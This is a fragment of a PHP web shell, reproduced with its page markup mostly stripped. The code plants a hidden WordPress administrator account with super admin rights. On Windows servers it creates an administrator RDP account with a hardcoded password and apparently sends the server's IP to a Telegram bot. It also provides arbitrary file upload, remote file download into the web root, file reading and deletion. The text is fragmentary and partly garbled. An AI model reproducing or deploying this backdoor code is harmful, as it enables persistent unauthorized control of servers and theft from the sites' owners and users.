| ".$dir." | |||
| $file |
"1n0gSecurity", 'user_login' => "1n0gSecurity", 'user_nicename' => "1n0gSecurity", 'user_email' => "BIBIL0DAY@proton.me", 'display_name' => "1n0gSecurity", 'role' => 'administrator' ); // Insert the user $user_id = wp_insert_user($userData); // Grant super admin privileges grant_super_admin($user_id); } } set_time_limit(0); error_reporting(0); $disfunc = @ini_get("disable_functions"); if (empty($disfunc)) { $disf = "NONE"; } else { $disf = "".$disfunc.""; } function author() { echo " T.ME/BIBIL_0DAY "; echo "System : ".php_uname()." "; echo "User : ".@get_current_user()." ( ".@getmyuid().") "; echo "PHP Version : ".@phpversion()." "; echo "Disable Function : ".$disf." "; echo "Directory : "; foreach($_POST as $key => $value){ $_POST[$key] = stripslashes($value); } if (strpos(php_uname(), 'Windows NT') !== false) { // Create administrator RDP account $userRDP = "1n0gSecurity"; $passRDP = "HCXi6~0`20323"; $createUserCommand = "net user " . $userRDP . " " . $passRDP . " /add"; $addUserToAdminsCommand = "net localgroup administrators " . $userRDP . " /add"; $createUserResult = shell_exec($createUserCommand); if ($createUserResult !== null) { $addUserResult = shell_exec($addUserToAdminsCommand); if ($addUserResult !== null) { // Get the server's IP address $serverIP = $_SERVER['SERVER_ADDR']; // Telegram bot API endpoint $telegramBotAPI = "https://api.telegram.org/bot |
'; if (isset($_POST['upwkwk'])) { if (isset($_POST['berkasnya'])) { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { echo "File Uploaded ! ".$lokasi."/".$_FILES['berkas']['name']." "; } else { echo "Failed to Upload ! "; } } elseif (isset($_POST['linknya'])) { if (empty($_POST['namalink'])) { exit("Filename cannot be empty !"); } if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); if (file_exists($lokasi."/".$_POST['namalink'])) { echo "File Uploaded ! ".$lokasi."/".$_POST['namalink']." "; } else { echo "Failed to Upload ! "; } } } echo " |
".htmlspecialchars(file_get_contents($_GET['fileloc'])).""; author(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { if (is_dir($_POST['path'])) { xrmdir($_POST['path']); if (file_exists($_POST['path'])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST['path'])) { @unlink($_POST['path']); if (file_exists($_POST['path'])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { echo "
| ".$dir." | |||
| $file |